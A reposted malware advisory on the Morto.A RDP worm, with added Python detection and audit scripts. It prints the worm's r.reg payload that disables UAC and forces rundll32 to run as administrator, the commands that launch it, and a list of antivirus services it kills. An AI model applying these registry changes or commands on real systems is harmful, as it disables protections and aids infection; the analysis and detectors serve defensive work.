Remote connection with rundll32

Posted on 14-Apr-2015


SonicWALL Security Center

RDP Worm Morto.A (Aug. 31, 2011)

Description

The SonicWALL UTM Research team received reports of a new internet worm propagating in the wild. This worm targets Remote Desktop Protocol (RDP) and has the capability to download additional malicious components, terminate antivirus-related security processes and services, perform distributed Denial-of-Service (DDoS) attacks, and be remotely controlled from a malicious server.

Process of Infection:

This worm targets machines via Remote Desktop Protocol (RDP) by compromising weak administrator passwords. Once a system is infected, it scans the local network for RDP services listening on port 3389. It uses a set of usernames and passwords to gain access to these RDP machines and infect them.
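The propagation step above leaves a recognisable trace on the victim side: a burst of failed RemoteInteractive logons (Security Event ID 4625 with LogonType 10) from one source against several account names, sometimes followed by a success (4624). The following detection routine is an added example and is not part of the SonicWALL alert; the event records are constructed sample data, and the thresholds are assumptions an analyst would tune.

```python
"""Flag RDP password-guessing bursts in Windows Security logon events.

Added example (not from the SonicWALL alert). A source that produces many
failed RDP logons (4625, LogonType 10) against several usernames inside a
short window is the footprint a worm guessing administrator passwords over
port 3389 leaves behind. SAMPLE_EVENTS is constructed data, not a real log.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (time, event_id, logon_type, target_user, source_ip)
SAMPLE_EVENTS = [
    ("2011-08-31T10:00:01", 4625, 10, "administrator", "10.0.0.23"),
    ("2011-08-31T10:00:02", 4625, 10, "admin", "10.0.0.23"),
    ("2011-08-31T10:00:03", 4625, 10, "Administrator", "10.0.0.23"),
    ("2011-08-31T10:00:04", 4625, 10, "user", "10.0.0.23"),
    ("2011-08-31T10:00:05", 4625, 10, "test", "10.0.0.23"),
    ("2011-08-31T10:00:06", 4625, 10, "admin1", "10.0.0.23"),
    ("2011-08-31T10:00:09", 4624, 10, "admin", "10.0.0.23"),   # guess succeeded
    ("2011-08-31T10:05:00", 4625, 10, "jsmith", "10.0.0.50"),  # one typo by a real user
    ("2011-08-31T10:06:00", 4625, 2, "jsmith", "10.0.0.50"),   # console logon, not RDP
]


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def find_rdp_guessing(events, window=timedelta(minutes=2), min_failures=5, min_users=3):
    """Return {source_ip: {"failures": n, "users": [...], "success_after": bool}}
    for each source whose failed RDP logons inside `window` reach the thresholds.
    The reported window is the densest one seen for that source."""
    by_source = defaultdict(list)
    for ts, eid, ltype, user, src in events:
        if ltype != 10:            # only RemoteInteractive (RDP) logons matter here
            continue
        by_source[src].append((parse_ts(ts), eid, user))

    hits = {}
    for src, recs in by_source.items():
        recs.sort()
        failures = [(t, u) for t, e, u in recs if e == 4625]
        best = None
        start = 0
        for end in range(len(failures)):          # sliding window over failures
            while failures[end][0] - failures[start][0] > window:
                start += 1
            span = failures[start:end + 1]
            users = sorted({u for _, u in span}, key=str.lower)
            if len(span) >= min_failures and len(users) >= min_users:
                if best is None or len(span) > best[0]:
                    best = (len(span), users, span[-1][0])
        if best:
            count, users, last_fail = best
            # a success from the same source after the burst is the worst case
            success_after = any(e == 4624 and t >= last_fail for t, e, _ in recs)
            hits[src] = {"failures": count, "users": users, "success_after": success_after}
    return hits


if __name__ == "__main__":
    for src, info in find_rdp_guessing(SAMPLE_EVENTS).items():
        print(src, info)
```

Only LogonType 10 is counted so that console and network-share failures do not inflate the figure; the single failure from 10.0.0.50 is below both thresholds and is not reported.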

Installation:

This worm has three components: Main executable, DLL loader, and the payload.

Main Executable

The main executable drops the DLL loader ntshrui.dll in the %windir%\temp directory and copies it as clb.dll in the %windir% directory.

It adds the following registry entries as part of its installation:

• HKLM\SYSTEM\Wpa\it
• HKLM\SYSTEM\Wpa\id
• HKLM\SYSTEM\Wpa\ie
• HKLM\SYSTEM\Wpa\sr
• HKLM\SYSTEM\Wpa\sn
• HKLM\SYSTEM\Wpa\md

It then deletes the following registry key to remove its tracks:

• HKCU "Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

The DLL loader clb.dll located in the %windir% directory is loaded once the malware spawns the Registry Editor process (regedit.exe).

There is a legitimate clb.dll in the %windir%\system32 directory that regedit.exe actually uses. But because of the way Windows resolves DLLs, looking in the %windir% directory before %windir%\system32, the malware's clb.dll is loaded instead of the legitimate one.
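The shadowing described above is a consequence of Windows searching the directory that contains the executable before %windir%\system32; regedit.exe resides in %windir%, so a clb.dll placed beside it wins. The audit below is an added example, not part of the SonicWALL alert: it models that search order and reports any DLL for which a copy in %windir% would be chosen over the system32 copy, using a throwaway directory tree instead of a live system.

```python
"""Audit for DLL search-order shadowing of the kind the alert describes.

Added example (not from the SonicWALL alert). resolve_dll() models the part of
the Windows load order that matters here: the executable's own directory is
searched before %windir%\\system32. regedit.exe lives in %windir%, so a planted
%windir%\\clb.dll is found before the real %windir%\\system32\\clb.dll.
demo() builds a constructed tree under a temp directory; nothing real is touched.
"""
import os
import tempfile


def resolve_dll(dll_name, app_dir, system32_dir, windows_dir):
    """Return the path Windows would load first. SafeDllSearchMode order, with the
    current directory and PATH omitted since they are irrelevant to this case."""
    for directory in (app_dir, system32_dir, windows_dir):
        candidate = os.path.join(directory, dll_name)
        if os.path.isfile(candidate):
            return candidate
    return None


def find_shadowed_dlls(windows_dir, dll_names):
    """For executables that live in windows_dir (regedit.exe is one), report
    DLLs whose resolved copy is not the legitimate system32 copy."""
    system32 = os.path.join(windows_dir, "system32")
    findings = {}
    for name in dll_names:
        loaded = resolve_dll(name, windows_dir, system32, windows_dir)
        legit = os.path.join(system32, name)
        if loaded and os.path.isfile(legit) and os.path.normcase(loaded) != os.path.normcase(legit):
            findings[name] = loaded
    return findings


def demo():
    """Constructed tree: legitimate system32\\clb.dll and sens.dll, plus a planted
    clb.dll one level up, mirroring the layout the alert describes."""
    root = tempfile.mkdtemp()
    windows = os.path.join(root, "windows")
    os.makedirs(os.path.join(windows, "system32"))
    for rel in ("system32/clb.dll", "system32/sens.dll", "clb.dll"):
        with open(os.path.join(windows, *rel.split("/")), "wb") as f:
            f.write(b"stub")   # contents are irrelevant; only placement matters
    return find_shadowed_dlls(windows, ["clb.dll", "sens.dll"])


if __name__ == "__main__":
    print(demo())
```

On a real host the same check amounts to listing %windir% for files that share a name with a DLL in %windir%\system32; anything found there deserves a hash comparison and a look at its signer.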

DLL Loader

After being loaded by the regedit process, it decrypts the payload DLL and loads it into memory. It also performs the following activities:

Added Registry:

Key: HKLM\SYSTEM\CurrentControlSet\Control\Windows
Value: "NoPopUpsOnBoot"
Data: "1"

Key: HKLM\SYSTEM\CurrentControlSet\Services\6to4\Parameters
Value: "ServiceDll"
Data: "%windir%\temp\ntshrui.dll"

Modified Registry:

Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters
Value: ServiceDll
Data Before: %SystemRoot%\system32\sens.dll
Data After: %SystemRoot%\system32\sens32.dll
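Both registry changes listed above are ServiceDll persistence: 6to4 is pointed at a DLL under %windir%\temp, and SENS is switched from sens.dll to sens32.dll. The audit below is an added example, not part of the SonicWALL alert; it runs over a constructed dictionary standing in for an export of HKLM\SYSTEM\CurrentControlSet\Services\<service>\Parameters, and the baseline of expected DLL names is an assumption the operator supplies.

```python
"""Audit svchost-hosted services' ServiceDll values.

Added example (not from the SonicWALL alert). Two conditions cover both
changes the alert lists: a ServiceDll outside %SystemRoot%\\system32 (6to4 ->
%windir%\\temp\\ntshrui.dll) and a ServiceDll whose filename differs from the
baseline for that service (SENS -> sens32.dll instead of sens.dll). SNAPSHOT and
BASELINE are constructed; on a live host the values come from the registry.
"""
import ntpath

# Directories a ServiceDll is normally expected to live in (lower-case, assumption).
TRUSTED_DIRS = (r"%systemroot%\system32", r"%windir%\system32", r"c:\windows\system32")

# Constructed baseline: service name -> filename it should load.
BASELINE = {"SENS": "sens.dll"}

# Constructed snapshot mirroring the values named in the alert, plus one clean service.
SNAPSHOT = {
    "SENS": {"ServiceDll": r"%SystemRoot%\system32\sens32.dll"},
    "6to4": {"ServiceDll": r"%windir%\temp\ntshrui.dll"},
    "Schedule": {"ServiceDll": r"%SystemRoot%\system32\schedsvc.dll"},
}


def audit_service_dlls(snapshot, baseline):
    """Return a list of (service, reason, value) for suspicious ServiceDll entries."""
    findings = []
    for svc, params in snapshot.items():
        dll = params.get("ServiceDll")
        if not dll:
            continue                      # service is not svchost-hosted
        directory, filename = ntpath.split(dll)
        if directory.lower() not in TRUSTED_DIRS:
            findings.append((svc, "ServiceDll outside system32", dll))
        elif svc in baseline and filename.lower() != baseline[svc].lower():
            findings.append((svc, "ServiceDll differs from baseline " + baseline[svc], dll))
    return findings


if __name__ == "__main__":
    for finding in audit_service_dlls(SNAPSHOT, BASELINE):
        print(*finding)
```

The baseline check is what catches the SENS change, since sens32.dll sits in the trusted directory; a directory-only check would miss it.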

Added Files:

%windir%\offline web pages\{Current Date}
%windir%\offline web pages\1.40_testDdos
%windir%\offline web pages\cache.txt - blocked as [ GAV: Morto.A_2 (Trojan) ]
%windir%\system32\sens32.dll - blocked as [ GAV: Morto.A_2 (Trojan) ]

DLL Payload

The malware attempts to connect to RDP servers on the local network through port 3389 using administrator accounts. Some of the accounts are shown below:

It copies the following files to the RDP workstations through \\tsclient\a\:

• \\tsclient\a\a.dll - blocked as [ GAV: Morto.A_2 (Trojan) ]

• \\tsclient\a\r.reg

The contents of r.reg, shown below, ensure that rundll32.exe runs the malware with administrator privileges without prompting the user for permission for any system changes:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CuurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"c:\\winnt\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2008\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2k8\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win7\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows7\\system32\\rundll32.exe"="RUNASADMIN"
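The r.reg file does two things worth checking for on any host that accepts RDP: it zeroes EnableLUA and ConsentPromptBehaviorAdmin under the Policies\System key, and it tags every plausible rundll32.exe path with a RUNASADMIN compatibility layer. The parser and check below are an added example, not part of the SonicWALL alert; the sample text is a trimmed copy of the r.reg contents shown above, and the parser handles only the subset of Regedit export syntax needed here (string and dword values).

```python
"""Parse Regedit export text and flag UAC-disabling values and RUNASADMIN layers.

Added example (not from the SonicWALL alert). parse_reg() understands [key]
headers, "name"="string" and "name"=dword:hex lines, which is all r.reg uses.
flag_uac_and_layer_changes() then reports EnableLUA / ConsentPromptBehaviorAdmin
set to 0 and any AppCompatFlags\\Layers entry that applies RUNASADMIN to
rundll32.exe. SAMPLE_REG is a trimmed copy of the alert's r.reg.
"""
import re

SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CuurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
'''

UAC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

_KEY_RE = re.compile(r"^\[(-?)(.+)\]$")
_VAL_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')   # "name"=rhs, with \" and \\ escapes


def _unescape(s):
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg(text):
    """Return {key_path: {value_name: (kind, data)}}; '@' is the default value."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group(2)
            result.setdefault(current, {})
            continue
        if current is None:
            continue                      # value line before any key header
        if line.startswith("@="):
            name, rhs = "@", line[2:]
        else:
            m = _VAL_RE.match(line)
            if not m:
                continue
            name, rhs = _unescape(m.group(1)), m.group(2)
        if rhs.startswith('"') and rhs.endswith('"'):
            result[current][name] = ("string", _unescape(rhs[1:-1]))
        elif rhs.lower().startswith("dword:"):
            result[current][name] = ("dword", int(rhs[6:], 16))
        else:
            result[current][name] = ("raw", rhs)
    return result


def flag_uac_and_layer_changes(parsed):
    """Return human-readable findings for the two changes r.reg makes."""
    findings = []
    uac = parsed.get(UAC_KEY, {})
    for name in ("EnableLUA", "ConsentPromptBehaviorAdmin"):
        if uac.get(name) == ("dword", 0):
            findings.append("UAC weakened: %s=0" % name)
    for key, values in parsed.items():
        if not key.lower().endswith(r"\appcompatflags\layers"):
            continue
        for exe, (kind, data) in values.items():
            if kind == "string" and exe.lower().endswith("rundll32.exe") and "RUNASADMIN" in data.upper():
                findings.append("RUNASADMIN layer on " + exe)
    return findings


if __name__ == "__main__":
    for line in flag_uac_and_layer_changes(parse_reg(SAMPLE_REG)):
        print(line)
```

The Layers check matches on the key suffix rather than the full path, so it still fires on the misspelt "CuurrentVersion" path in the sample; the same logic can be pointed at a full HKCU export from a suspect host.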

Once the files have been copied to the RDP workstations, the malware runs them with the following commands:

• "regedit /s \\tsclient\a\r.reg"
• "rundll32 \\tsclient\a\a.dll a"

It also terminates the following services belonging to AV security software:

• 360rp
• a2service
• ACAAS
• ArcaConfSV
• AvastSvc
• avguard
• avgwdsvc
• avp
• avpmapp
• ccSvcHst
• cmdagent
• coreService
• FortiScand
• FPAVServer
• freshclam
• fsdfwd
• GDFwSvc
• K7RTScan
• knsdave
• KVSrvXP
• kxescore
• mcshield
• MPSvc
• MsMpEng
• NSESVC.EXE
• PavFnSvr
• RavMonD
• SavService
• scanwscs
• Shell
• SpySweeper
• Vba32Ldr
• vsserv
• zhudongfangyu

Network Activities:

The malware tries to contact the following URLs:

• qf{REMOVED}.net
• ms.ji{REMOVED}nfo
• ms.ji{REMOVED}o.cc
• ms.ji{REMOVED}o.be

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Morto.A (Worm)
GAV: Morto.A_2 (Trojan)
